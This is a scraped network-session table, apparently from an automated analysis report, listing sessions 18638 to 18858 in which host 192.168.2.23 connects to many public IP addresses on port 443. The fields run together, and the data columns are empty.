                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18638192.168.2.23600141.12.44.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18639192.168.2.2344438203.46.127.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18640192.168.2.235423013.213.222.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18641192.168.2.235640034.152.105.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18642192.168.2.2354714218.219.124.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18643192.168.2.235117078.107.178.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18644192.168.2.2360956105.126.116.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18645192.168.2.2359408116.82.220.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18646192.168.2.2343586199.129.242.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18647192.168.2.235767852.86.55.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18648192.168.2.234465043.140.228.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18649192.168.2.233679640.236.239.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18650192.168.2.2336786195.129.212.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18651192.168.2.2351178102.209.134.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18652192.168.2.2353282161.94.73.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18653192.168.2.2342600114.213.81.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18654192.168.2.234470450.156.250.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18655192.168.2.2337420155.76.197.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18656192.168.2.2358594216.41.251.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18657192.168.2.23333089.143.128.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18658192.168.2.2349758155.131.19.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18659192.168.2.2343338207.148.57.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18660192.168.2.2340754177.186.87.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18661192.168.2.2344002167.236.254.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18662192.168.2.233753696.25.206.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18663192.168.2.234043820.152.1.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18664192.168.2.2349784191.245.122.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18665192.168.2.2352148160.134.50.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18666192.168.2.2353216131.60.105.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18667192.168.2.2337700174.63.154.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18668192.168.2.2351216157.222.4.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18669192.168.2.2348384149.184.72.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18670192.168.2.2356018211.7.185.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18671192.168.2.234336898.120.41.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18672192.168.2.233280051.201.136.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18673192.168.2.233604686.162.55.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18674192.168.2.2360094143.128.44.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18675192.168.2.233304076.135.112.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18676192.168.2.2349434210.227.181.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18677192.168.2.2351046203.228.121.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18678192.168.2.23564285.215.105.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18679192.168.2.234793842.140.165.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18680192.168.2.2341842122.120.201.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18681192.168.2.235360492.31.82.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18682192.168.2.2335424177.151.133.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18683192.168.2.2359298201.151.219.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18684192.168.2.2344288171.146.214.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18685192.168.2.2338346121.164.147.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18686192.168.2.236087259.10.181.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18687192.168.2.234536073.248.159.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18688192.168.2.233550047.58.58.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18689192.168.2.2337506152.144.197.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18690192.168.2.23429909.16.148.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18691192.168.2.2360522179.108.18.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18692192.168.2.2351788180.206.131.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18693192.168.2.233607291.77.2.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18694192.168.2.2358220188.244.106.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18695192.168.2.2345432107.120.252.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18696192.168.2.2358860136.254.253.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18697192.168.2.2357984173.7.143.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18698192.168.2.234995672.12.104.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18699192.168.2.2355014173.54.16.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18700192.168.2.2336754107.130.77.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18701192.168.2.2343462169.136.79.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18702192.168.2.233677847.175.27.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18703192.168.2.234519240.20.193.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18704192.168.2.2332772160.183.11.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18705192.168.2.235370657.198.138.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18706192.168.2.235124654.104.223.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18707192.168.2.234294299.0.28.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18708192.168.2.233318637.28.111.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18709192.168.2.233720698.202.163.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18710192.168.2.2352182172.243.166.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18711192.168.2.233282852.58.84.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18712192.168.2.2333462110.210.59.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18713192.168.2.233633664.90.28.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18714192.168.2.2347858197.192.187.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18715192.168.2.2351958197.65.196.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18716192.168.2.235593874.205.57.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18717192.168.2.234208834.233.175.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18718192.168.2.235083852.209.237.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18719192.168.2.2359582146.93.246.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18720192.168.2.235513879.161.73.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18721192.168.2.2335194203.67.149.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18722192.168.2.233966852.23.9.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18723192.168.2.233716884.40.32.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18724192.168.2.234301440.107.180.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18725192.168.2.2332854131.190.174.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18726192.168.2.234051654.207.71.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18727192.168.2.235782265.172.1.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18728192.168.2.235176497.147.252.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18729192.168.2.233872643.208.233.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18730192.168.2.234262069.120.215.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18731192.168.2.234972692.56.140.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18732192.168.2.2347314109.13.234.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18733192.168.2.2341846157.132.77.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18734192.168.2.2350902222.194.229.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18735192.168.2.2353834193.181.53.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18736192.168.2.233693647.10.99.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18737192.168.2.2337442106.243.195.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18738192.168.2.235465447.2.125.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18739192.168.2.2352736154.186.191.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18740192.168.2.2356792136.7.224.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18741192.168.2.234272299.45.135.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18742192.168.2.2350818144.164.58.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18743192.168.2.2354972217.128.151.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18744192.168.2.2347312208.56.207.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18745192.168.2.235614270.31.62.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18746192.168.2.2338630115.174.59.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18747192.168.2.2337254105.94.217.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18748192.168.2.235638057.22.115.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18749192.168.2.2347526172.237.12.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18750192.168.2.2347342100.40.52.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18751192.168.2.2352502159.124.90.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18752192.168.2.2356072221.173.44.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18753192.168.2.233938459.83.98.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18754192.168.2.2344762128.129.118.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18755192.168.2.234631652.24.18.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18756192.168.2.2359324206.19.173.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18757192.168.2.2344890213.152.185.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18758192.168.2.2340300167.78.167.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18759192.168.2.2338410130.238.30.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18760192.168.2.234159684.180.123.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18761192.168.2.2340350120.74.185.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18762192.168.2.234085669.64.194.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18763192.168.2.23450042.145.214.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18764192.168.2.2347714134.62.67.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18765192.168.2.235778423.211.122.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18766192.168.2.234271251.249.211.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18767192.168.2.233832085.241.86.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18768192.168.2.2343932171.246.77.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18769192.168.2.2341540200.113.218.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18770192.168.2.2360364100.140.189.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18771192.168.2.2340030162.233.228.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18772192.168.2.2354042196.190.237.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18773192.168.2.23530428.142.156.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18774192.168.2.2353522101.129.173.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18775192.168.2.233557050.204.247.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18776192.168.2.2358788187.17.61.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18777192.168.2.2353378161.11.99.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18778192.168.2.2335650213.95.91.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18779192.168.2.2346252100.175.222.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18780192.168.2.2341890128.161.17.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18781192.168.2.2357428110.244.55.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18782192.168.2.2348330194.56.107.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18783192.168.2.2341542171.40.177.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18784192.168.2.2337646157.172.57.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18785192.168.2.2335370120.21.205.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18786192.168.2.235276647.56.110.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18787192.168.2.2341246200.105.172.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18788192.168.2.2340932198.200.114.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18789192.168.2.2346050148.7.10.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18790192.168.2.2348456164.12.101.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18791192.168.2.235904297.4.22.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18792192.168.2.2354098209.247.60.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18793192.168.2.235777658.230.63.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18794192.168.2.23544821.115.113.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18795192.168.2.2356226218.55.186.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18796192.168.2.2336150131.75.137.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18797192.168.2.2336668222.116.227.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18798192.168.2.2358982155.32.241.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18799192.168.2.2354900174.117.151.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18800192.168.2.2344174101.86.34.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18801192.168.2.2351468155.211.154.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18802192.168.2.2341558145.146.233.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18803192.168.2.2350888100.51.86.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18804192.168.2.2353642181.170.247.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18805192.168.2.2335944221.115.115.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18806192.168.2.2343308173.251.197.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18807192.168.2.233427299.162.114.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18808192.168.2.2344974176.94.132.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18809192.168.2.23591688.171.43.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18810192.168.2.234207868.237.46.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18811192.168.2.2334184164.192.156.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18812192.168.2.2349982128.236.93.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18813192.168.2.2334540212.77.247.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18814192.168.2.2338476180.198.248.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18815192.168.2.2344116161.25.224.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18816192.168.2.2354348157.23.136.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18817192.168.2.233846899.119.97.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18818192.168.2.23563169.27.109.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18819192.168.2.2343118218.35.22.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18820192.168.2.233577870.183.85.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18821192.168.2.234417462.74.134.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18822192.168.2.2336278108.81.28.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18823192.168.2.2335800182.78.237.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18824192.168.2.2350168103.91.36.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18825192.168.2.2344846168.84.68.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18826192.168.2.2355232106.68.87.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18827192.168.2.233677458.211.189.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18828192.168.2.2348160128.194.223.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18829192.168.2.234579677.192.43.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18830192.168.2.2353348217.109.38.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18831192.168.2.234570018.81.115.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18832192.168.2.2342948188.151.137.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18833192.168.2.236025847.148.126.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18834192.168.2.2352232144.209.60.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18835192.168.2.2339956150.173.43.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18836192.168.2.233470278.62.188.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18837192.168.2.2356290119.232.156.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18838192.168.2.2333098183.178.23.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18839192.168.2.2335206109.0.66.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18840192.168.2.2346890211.239.55.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18841192.168.2.2338962191.131.78.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18842192.168.2.2335958113.82.210.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18843192.168.2.233855413.75.253.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18844192.168.2.235295076.210.68.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18845192.168.2.2335124222.106.39.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18846192.168.2.2343902166.118.210.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18847192.168.2.233862834.154.0.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18848192.168.2.235331240.159.27.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18849192.168.2.2345282207.10.229.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18850192.168.2.235067432.164.236.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18851192.168.2.234164053.237.29.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18852192.168.2.234133270.18.9.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18853192.168.2.2335500171.97.181.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18854192.168.2.2352746142.221.57.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18855192.168.2.235427073.235.68.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18856192.168.2.233426685.133.184.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18857192.168.2.23461164.228.238.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18858192.168.2.2334384138.67.82.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
